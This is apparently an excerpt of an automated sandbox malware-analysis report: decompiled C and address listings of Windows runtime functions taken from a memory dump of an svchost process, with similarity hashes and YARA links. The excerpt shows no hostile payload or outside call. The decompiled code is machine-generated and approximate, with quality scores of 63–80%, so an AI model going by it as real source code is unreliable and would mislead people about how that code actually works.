                                          0x03a5fbb1
                                          0x03a5fbb1
                                          0x03a5fbb8
                                          0x03a5fbbd
                                          0x03a5fbbd
                                          0x03a5fbbf
                                          0x03a5fbbf
                                          0x03a5fbc5
                                          0x03a5fbcb
                                          0x03a5fbf8
                                          0x03a5fbf8
                                          0x03a5fbfa
                                          0x00000000
                                          0x03a5fc00
                                          0x03a5fc00
                                          0x03a5fc03
                                          0x00000000
                                          0x03a5fc09
                                          0x03a5fc09
                                          0x03a5fc0f
                                          0x03a5fc15
                                          0x03a5fc23
                                          0x03a5fc23
                                          0x03a5fc25
                                          0x03a5fc27
                                          0x03a5fc75
                                          0x03a5fc7c
                                          0x03a5fc84
                                          0x00000000
                                          0x03a5fc29
                                          0x03a5fc29
                                          0x03a5fc2d
                                          0x03a5fc30
                                          0x03a9bf0f
                                          0x00000000
                                          0x03a5fc36
                                          0x03a5fc38
                                          0x03a5fc3b
                                          0x03a5fc41
                                          0x03a9bf17
                                          0x03a9bf19
                                          0x03a9bf48
                                          0x03a9bf4b
                                          0x00000000
                                          0x03a9bf1b
                                          0x03a9bf22
                                          0x03a9bf24
                                          0x03a9bf26
                                          0x00000000
                                          0x03a9bf2c
                                          0x03a9bf37
                                          0x03a9bf39
                                          0x03a9bf3b
                                          0x00000000
                                          0x03a9bf41
                                          0x03a9bf41
                                          0x03a9bf41
                                          0x03a9bf41
                                          0x03a9bf45
                                          0x00000000
                                          0x03a9bf45
                                          0x03a9bf3b
                                          0x03a9bf26
                                          0x00000000
                                          0x03a5fc47
                                          0x03a5fc47
                                          0x03a5fc49
                                          0x03a5fcb2
                                          0x03a5fcb4
                                          0x03a5fcb6
                                          0x03a5fcdc
                                          0x03a5fcdc
                                          0x00000000
                                          0x03a5fcb8
                                          0x03a5fcc3
                                          0x03a5fcc5
                                          0x03a5fcc7
                                          0x00000000
                                          0x03a5fcc9
                                          0x03a5fcc9
                                          0x03a5fccd
                                          0x00000000
                                          0x03a5fccd
                                          0x03a5fcc7
                                          0x00000000
                                          0x03a5fc4b
                                          0x03a5fc4b
                                          0x03a5fc4e
                                          0x03a5fc4e
                                          0x03a5fc51
                                          0x03a5fc51
                                          0x03a5fc54
                                          0x03a5fc5a
                                          0x03a5fc5c
                                          0x03a5fc5f
                                          0x03a5fc61
                                          0x03a5fc63
                                          0x03a5fc65
                                          0x03a5fc67
                                          0x03a5fc6e
                                          0x03a5fc72
                                          0x03a5fc72
                                          0x03a5fc72
                                          0x03a5fc72
                                          0x03a5fc67
                                          0x03a5fc61
                                          0x00000000
                                          0x03a5fc5a
                                          0x03a5fc49
                                          0x03a5fc41
                                          0x03a5fc30
                                          0x03a5fc27
                                          0x03a5fc03
                                          0x03a5fbcd
                                          0x03a5fbd3
                                          0x03a5fbd9
                                          0x03a5fbdc
                                          0x03a5fbde
                                          0x03a5fc99
                                          0x03a5fc9b
                                          0x03a5fc9d
                                          0x03a5fcd5
                                          0x03a5fcd5
                                          0x03a5fc89
                                          0x03a5fc89
                                          0x00000000
                                          0x03a5fc9f
                                          0x03a5fc9f
                                          0x03a5fca3
                                          0x00000000
                                          0x03a5fca3
                                          0x00000000
                                          0x03a5fbe4
                                          0x03a5fbe4
                                          0x03a5fbe4
                                          0x03a5fbe4
                                          0x03a5fbe9
                                          0x03a5fbf2
                                          0x00000000
                                          0x03a5fbf2
                                          0x03a5fbde
                                          0x03a5fbcb
                                          0x03a5fbab
                                          0x03a5fc8b
                                          0x03a5fc8b
                                          0x03a5fc8c
                                          0x03a5fb80
                                          0x03a5fb72
                                          0x03a5fb5e
                                          0x03a5fc8d
                                          0x03a5fc91
                                          0x03a5fadf
                                          0x03a5fadf
                                          0x03a5fae1
                                          0x03a5fae4
                                          0x03a5fae7
                                          0x03a5faec
                                          0x03a5faf8
                                          0x03a5fb00
                                          0x03a5fb07
                                          0x03a5fb0f
                                          0x03a5fb0f
                                          0x03a5fb07
                                          0x00000000
                                          0x03a5faf8
                                          0x03a5fadd

                                          Strings
                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 03A9BE0F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                          • API String ID: 0-865735534
                                          • Opcode ID: 72fbffa1a1ee702e0d831e361551dd92f0bc79553d9a6bbc0d09fc2d58c86c5e
                                          • Instruction ID: 3821a8e14f30450072e1e754edcd5dfaf79fd638ee578af3744560a1cd4d1713
                                          • Opcode Fuzzy Hash: 72fbffa1a1ee702e0d831e361551dd92f0bc79553d9a6bbc0d09fc2d58c86c5e
                                          • Instruction Fuzzy Hash: 0BA1DD75A01606DFEB25DB68C554BAAB3B9AB48714F0846BFFC06DB780DB34D8418B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A22D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E03A22D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x3b15350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x3b17bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E03A697C0();
				}
				if( *0x3b179c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x3b179c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E03A51624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E03A47D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E03ABFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03A69520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E03A5E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L03A7DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x3b16901;
								_push(_t109);
								_v52 = _t98;
								if( *0x3b16901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03A69980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E03A695D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E03A47D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E03A47D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E03AA7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E03ABFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x3b15350;
							if(_t109 != 0x3b15350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E03ABFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E03AB5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                          0x03a22d8a
                                          0x03a22d8a
                                          0x03a22d92
                                          0x03a22d96
                                          0x03a22d9e
                                          0x03a22da0
                                          0x03a22da3
                                          0x03a22da5
                                          0x03a22da8
                                          0x03a22dab
                                          0x03a22db2
                                          0x03a7f9aa
                                          0x03a7f9ab
                                          0x03a7f9ae
                                          0x03a7f9ae
                                          0x03a22db8
                                          0x03a22dc2
                                          0x03a7f9b9
                                          0x03a7f9be
                                          0x03a7f9bf
                                          0x03a7f9bf
                                          0x03a22dcf
                                          0x03a7f9c9
                                          0x03a22dd5
                                          0x03a22dd5
                                          0x03a22dd5
                                          0x03a22dde
                                          0x03a22de1
                                          0x03a22e70
                                          0x03a22e72
                                          0x03a22e72
                                          0x03a22de7
                                          0x03a22deb
                                          0x03a22e7c
                                          0x03a22e83
                                          0x03a22e85
                                          0x03a22e8b
                                          0x03a22e8d
                                          0x03a22e92
                                          0x03a22e92
                                          0x03a22e85
                                          0x03a22df1
                                          0x03a22df7
                                          0x03a22df9
                                          0x03a22df9
                                          0x03a22dfc
                                          0x03a22dff
                                          0x03a22e02
                                          0x00000000
                                          0x03a22e05
                                          0x03a22e0c
                                          0x03a7f9d9
                                          0x03a22e12
                                          0x03a22e12
                                          0x03a22e12
                                          0x03a22e1a
                                          0x03a7f9e3
                                          0x03a7f9e9
                                          0x03a7f9f0
                                          0x03a7f9f6
                                          0x03a7f9f8
                                          0x03a7f9f8
                                          0x03a7f9f0
                                          0x03a22e23
                                          0x03a7fa02
                                          0x03a7fa03
                                          0x03a7fa05
                                          0x03a7fa06
                                          0x00000000
                                          0x03a22e29
                                          0x03a22e29
                                          0x03a22e2e
                                          0x03a22e34
                                          0x03a22e3e
                                          0x00000000
                                          0x00000000
                                          0x03a22e44
                                          0x03a22e47
                                          0x03a22e4d
                                          0x00000000
                                          0x00000000
                                          0x03a22e4f
                                          0x03a22e54
                                          0x00000000
                                          0x00000000
                                          0x03a22e5a
                                          0x03a22e5f
                                          0x03a22e9a
                                          0x03a22ea4
                                          0x03a22ea5
                                          0x03a22ea8
                                          0x03a22eaf
                                          0x03a22eb2
                                          0x03a22eb5
                                          0x03a7fae9
                                          0x03a7faeb
                                          0x03a7faed
                                          0x03a7faef
                                          0x03a7faf7
                                          0x03a7faf8
                                          0x03a7fafd
                                          0x03a7faff
                                          0x03a7fb04
                                          0x03a7fb04
                                          0x03a7faff
                                          0x03a22ec0
                                          0x03a22ec4
                                          0x03a22ec6
                                          0x03a22ec8
                                          0x03a7fb14
                                          0x03a7fb18
                                          0x03a7fb1e
                                          0x03a7fb21
                                          0x03a7fb21
                                          0x03a22ece
                                          0x03a22ece
                                          0x03a22ece
                                          0x03a22ed7
                                          0x03a22e61
                                          0x03a22e63
                                          0x03a7fa6b
                                          0x03a7fa71
                                          0x03a7fa76
                                          0x03a7fa78
                                          0x03a7fa8a
                                          0x03a7fa7a
                                          0x03a7fa83
                                          0x03a7fa83
                                          0x03a7fa8f
                                          0x03a7fa91
                                          0x03a7fa97
                                          0x03a7fa9d
                                          0x03a7faa4
                                          0x03a7faaa
                                          0x03a7faaf
                                          0x03a7fab1
                                          0x03a7fac3
                                          0x03a7fab3
                                          0x03a7fabc
                                          0x03a7fabc
                                          0x03a7fac8
                                          0x03a7facb
                                          0x03a7fadf
                                          0x03a7fadf
                                          0x03a7facb
                                          0x03a7faa4
                                          0x03a7fa91
                                          0x03a22e6f
                                          0x03a22e6f
                                          0x03a22e5f
                                          0x03a7fa13
                                          0x03a7fa15
                                          0x03a7fa17
                                          0x03a7fa1f
                                          0x03a7fa21
                                          0x03a7fa22
                                          0x03a7fa25
                                          0x03a7fa28
                                          0x03a7fa2f
                                          0x03a7fa2f
                                          0x03a7fa2a
                                          0x03a7fa2a
                                          0x03a7fa2a
                                          0x03a7fa31
                                          0x03a7fa34
                                          0x03a7fa36
                                          0x03a7fa3c
                                          0x03a7fa3e
                                          0x03a7fa41
                                          0x03a7fa43
                                          0x03a7fa45
                                          0x03a7fa45
                                          0x03a7fa41
                                          0x03a7fa3c
                                          0x03a7fa4a
                                          0x03a7fa4f
                                          0x03a7fa51
                                          0x03a7fa53
                                          0x03a7fa56
                                          0x03a7fa5b
                                          0x03a7fa5e
                                          0x00000000
                                          0x03a7fa5e
                                          0x03a22e23

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Re-Waiting
                                          • API String ID: 0-316354757
                                          • Opcode ID: 04b9b579dab525e84f4505d3f185cb797dd34ce4cc39fcd557fa335146c13da8
                                          • Instruction ID: 0eeab4f9f26c98610f598d1caaa64029e25ad618f9e5bd387265a88864906dad
                                          • Opcode Fuzzy Hash: 04b9b579dab525e84f4505d3f185cb797dd34ce4cc39fcd557fa335146c13da8
                                          • Instruction Fuzzy Hash: 7461F331A00654AFDB31DB6CC984B7EBBB9EB49714F180AABE8119B2C1C7349A01C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AF0EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E03AF0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E03AEFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E03AF1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03A69730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E03AEA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E03AEA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x3b18b04 >> 0x14) + (_v44 -  *0x3b18b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E03A47D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E03AE138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E03A47D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E03ADFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x3b18724 & 0x00000008) != 0) {
						E03AE52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E03AF15B5(0x3b18ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                          0x03af0eb7
                                          0x03af0eb9
                                          0x03af0ec0
                                          0x03af0ec2
                                          0x03af0ecd
                                          0x03af105b
                                          0x03af105b
                                          0x03af1061
                                          0x03af1066
                                          0x03af1066
                                          0x03af106b
                                          0x03af1073
                                          0x03af1073
                                          0x03af0ed3
                                          0x03af0ed6
                                          0x03af0edc
                                          0x03af0ee0
                                          0x03af0ee7
                                          0x03af0ef0
                                          0x03af0ef5
                                          0x03af0efa
                                          0x03af0efc
                                          0x03af0efd
                                          0x03af0f03
                                          0x03af0f04
                                          0x03af0f06
                                          0x03af0f07
                                          0x03af0f09
                                          0x03af0f0e
                                          0x03af0f14
                                          0x03af0f23
                                          0x03af0f2d
                                          0x03af0f34
                                          0x03af0f34
                                          0x03af0f14
                                          0x03af0f52
                                          0x00000000
                                          0x00000000
                                          0x03af0f58
                                          0x03af0f73
                                          0x03af0f74
                                          0x03af0f79
                                          0x03af0f7d
                                          0x03af0f80
                                          0x03af0f86
                                          0x03af0fab
                                          0x03af0fb5
                                          0x03af0fc6
                                          0x03af0fd1
                                          0x03af0fe3
                                          0x03af0fd3
                                          0x03af0fdc
                                          0x03af0fdc
                                          0x03af0feb
                                          0x03af1009
                                          0x03af1009
                                          0x03af1015
                                          0x03af1027
                                          0x03af1017
                                          0x03af1020
                                          0x03af1020
                                          0x03af102f
                                          0x03af103c
                                          0x03af103c
                                          0x03af1048
                                          0x03af1050
                                          0x03af1050
                                          0x03af1055
                                          0x00000000
                                          0x03af1055
                                          0x03af0f88
                                          0x03af0f9e
                                          0x03af0fa2
                                          0x03af0fa9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03af0fa9
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: b529a239a7cb529400f32484ed3fe31ff6163f64e29398c8a850d3dcc50a954c
                                          • Instruction ID: 44f9a3c6c3b93a7a690a026140fae8c44950c2731d4cbd14270be8ac12114246
                                          • Opcode Fuzzy Hash: b529a239a7cb529400f32484ed3fe31ff6163f64e29398c8a850d3dcc50a954c
                                          • Instruction Fuzzy Hash: 9551B0712043819FD324DF69D980B1BB7E5EBC4704F080A2EFA969B291D771E805CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A5F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E03A5F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E03A44120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03A69830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03A69990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E03A695D0();
							goto L11;
						} else {
							_t109 = L03A44620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E03A6F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E03A695D0();
										L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                          0x03a5f0d3
                                          0x03a5f0d9
                                          0x03a5f0e0
                                          0x03a5f0e7
                                          0x03a5f0f2
                                          0x03a5f0f4
                                          0x03a5f0f8
                                          0x03a5f100
                                          0x03a5f108
                                          0x03a5f10d
                                          0x03a5f115
                                          0x03a5f116
                                          0x03a5f11f
                                          0x03a5f123
                                          0x03a5f124
                                          0x03a5f12c
                                          0x03a5f130
                                          0x03a5f134
                                          0x03a5f13d
                                          0x03a5f144
                                          0x03a5f14b
                                          0x03a5f152
                                          0x03a9bab0
                                          0x03a9bab0
                                          0x03a5f158
                                          0x03a5f158
                                          0x03a5f15a
                                          0x03a5f160
                                          0x03a5f165
                                          0x03a5f166
                                          0x03a5f16f
                                          0x03a5f173
                                          0x03a9baa7
                                          0x03a9baa7
                                          0x03a9baab
                                          0x00000000
                                          0x03a5f179
                                          0x03a5f18d
                                          0x03a5f191
                                          0x03a9baa2
                                          0x00000000
                                          0x03a5f197
                                          0x03a5f19b
                                          0x03a5f1a2
                                          0x03a5f1a9
                                          0x03a5f1af
                                          0x03a5f1b2
                                          0x03a5f1b6
                                          0x03a5f1b9
                                          0x03a5f1c4
                                          0x03a5f1d8
                                          0x03a5f1df
                                          0x03a5f1e3
                                          0x03a5f1eb
                                          0x03a5f1ee
                                          0x03a5f1f4
                                          0x03a5f20f
                                          0x03a9bab7
                                          0x03a9babb
                                          0x03a9bacc
                                          0x03a9bad1
                                          0x03a5f215
                                          0x03a5f218
                                          0x03a5f226
                                          0x03a5f22b
                                          0x00000000
                                          0x03a5f22b
                                          0x03a5f1f6
                                          0x03a5f1f6
                                          0x03a5f1f9
                                          0x03a5f1fb
                                          0x03a5f1fb
                                          0x03a5f1f4
                                          0x03a5f191
                                          0x03a5f173
                                          0x03a5f152
                                          0x03a5f203

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction ID: 23c355b28d2ce5f1a9dbbdf130322ce496eb735bf056d547cb6e2b5a58ecfc97
                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction Fuzzy Hash: 41516C755047109FD320DF59C940A6BBBF8FF88750F00892EFA959B690E7B4E914CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AA3540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E03AA3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x3b1d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03A60BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E03AA3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E03A6FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E03AA3540;
						E03A6FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E03A7DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E03AB0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E03A697C0();
					}
					return E03A6B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E03AA3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E03AA3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E03A6FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03A69650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
